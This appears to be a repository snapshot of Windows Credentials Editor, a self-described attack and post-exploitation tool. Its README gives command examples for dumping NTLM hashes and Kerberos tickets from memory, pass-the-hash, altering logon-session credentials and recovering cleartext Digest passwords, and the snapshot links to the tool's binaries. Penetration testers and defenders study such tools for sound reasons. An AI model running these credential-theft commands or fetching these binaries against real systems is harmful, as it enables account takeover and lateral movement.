├── Changelog
├── LICENSE.txt
├── README.md
├── getlsasrvaddr.exe
└── wce.exe

--------------------------------------------------------------------------------
/Changelog:
--------------------------------------------------------------------------------
Changelog for Windows Credentials Editor (WCE) 32-bit version

version 1.3beta:
March 8, 2012
-Bug fixes
-Extended support to obtain NTLM hashes without code injection
-Added feature to dump login cleartext passwords stored by the Digest Authentication package

--------------------------------------------------------------------------------
/LICENSE.txt:
--------------------------------------------------------------------------------
# Copyright (c) 2010,2011,2012 Hernan Ochoa and Amplia Security.
# All rights reserved.
#
# Unless you have express written permission from the Copyright Holder, any
# use of or distribution of this software or portions of it, including, but not
# limited to, reimplementations, modifications and derived work of it, in
# either source code or any other form, as well as any other software using or
# referencing it in any way, may NOT be sold for commercial gain, must be
# covered by this very same license, and must retain this copyright notice and
# this license.
# Neither the name of the Copyright Holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
# LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
# OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE
# ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU.
# SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
# SERVICING, REPAIR OR CORRECTION.
#
# IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
# ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE
# THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
# GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE
# OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR
# DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR
# A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH
# HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
#

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Windows Credentials Editor v1.3beta (32-bit)
(c) 2010, 2011, 2012 Amplia Security, Hernan Ochoa
written by: hernan@ampliasecurity.com
http://www.ampliasecurity.com
-------------------------------------------------------------

Abstract
----------

Windows Credentials Editor (WCE) v1.3beta allows you to

NTLM authentication:

* List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes)
* Perform pass-the-hash on Windows natively
* Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures. It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed.

Kerberos authentication:

* Dump Kerberos tickets (including the TGT) stored in Windows machines
* Reuse/Load those tickets on other Windows machines, to authenticate to other systems and services
* Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services

Digest Authentication:

* Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package


Supported Platforms
-------------------
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008.


Requirements
-------------
This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package.

Kerberos tickets can be obtained as a normal user, although administrator privileges might be required to obtain session keys depending on the system's configuration.

Please remember this is an attack and post-exploitation tool.

Options
--------
Windows Credentials Editor provides the following options:

Options:
  -l  List logon sessions and NTLM credentials (default).
  -s  Changes NTLM credentials of current logon session.
      Parameters: :::.
  -r  Lists logon sessions and NTLM credentials indefinitely.
      Refreshes every 5 seconds if new sessions are found.
      Optional: -r.
  -c  Run in a new session with the specified NTLM credentials.
      Parameters: .
  -e  Lists logon sessions and NTLM credentials indefinitely.
      Refreshes every time a logon event occurs.
  -o  Saves all output to a file.
      Parameters: .
  -i  Specify a LUID instead of using the current logon session.
      Parameters: .
  -d  Delete NTLM credentials from logon session.
      Parameters: .
  -a  Use Addresses.
      Parameters:
  -f  Force 'safe mode'.
  -g  Generate LM & NT Hash.
      Parameters: .
  -K  Dump Kerberos tickets to file (unix & 'windows wce' format)
  -k  Read Kerberos tickets from file and insert into Windows cache
  -w  Dump cleartext passwords stored by the digest authentication package
  -v  Verbose output.

Examples:

* List current logon sessions

    C:\>wce -l
    WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

    C:\>wce -l -v
    WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    Current Logon Session LUID: 00064081h
    Logon Sessions Found: 8
    WIN-REK2HG6EBIS\auser:NTLM
    LUID:0006409Fh
    WIN-REK2HG6EBIS\auser:NTLM
    LUID:00064081h
    NT AUTHORITY\ANONYMOUS LOGON:NTLM
    LUID:00019137h
    NT AUTHORITY\IUSR:Negotiate
    LUID:000003E3h
    NT AUTHORITY\LOCAL SERVICE:Negotiate
    LUID:000003E5h
    WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
    LUID:000003E4h
    \:NTLM
    LUID:0000916Ah
    WORKGROUP\WIN-REK2HG6EBIS$:NTLM
    LUID:000003E7h

    00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

    C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
    WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    Changing NTLM credentials of current logon session (00064081h) to:
    Username: auser
    domain: admin
    LMHash: 99999999999999999999999999999999
    NTHash: 99999999999999999999999999999999
    NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

    C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
    WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    Changing NTLM credentials of logon session 000003E5h to:
    Username: auser
    domain: admin
    LMHash: 99999999999999999999999999999999
    NTHash: 99999999999999999999999999999999
    NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

    C:\>wce -d 3e5
    WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.
  Refresh is performed every time a logon event is registered in the Event Log.

    C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions.
  Refresh is every 5 seconds by default.

    C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)

    C:\>wce -r5


* Generate LM & NT Hash.

    C:\>wce -g test

    WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    Password: test
    Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)

    C:\>wce -K
    WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    Converting and saving TGT in UNIX format to file wce_ccache...
    Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
    5 kerberos tickets saved to file 'wce_ccache'.
    5 kerberos tickets saved to file 'wce_krbtkts'.
    Done!

* Read Kerberos tickets from file and insert into Windows cache

    C:\>wce -k
    WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    Reading kerberos tickets from file 'wce_krbtkts'...
    5 kerberos tickets were added to the cache.
    Done!

* Dump cleartext passwords stored by the Digest Authentication package

    C:\>wce -w
    WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    test\MYDOMAIN:mypass1234
    NETWORK SERVICE\WORKGROUP:test



GETLSASRVADDR.EXE
-----------------
This tool can be used to automatically obtain the addresses WCE needs
to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the
"Debugging Tools for Windows" package.


Additional Information
----------------------

* http://www.ampliasecurity.com/research.html
* http://www.ampliasecurity.com/research/wcefaq.html
* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf

--------------------------------------------------------------------------------
/getlsasrvaddr.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/returnvar/wce/2762cc715e783b296e665d9e76c50c6c04a3cf1e/getlsasrvaddr.exe
--------------------------------------------------------------------------------
/wce.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/returnvar/wce/2762cc715e783b296e665d9e76c50c6c04a3cf1e/wce.exe
--------------------------------------------------------------------------------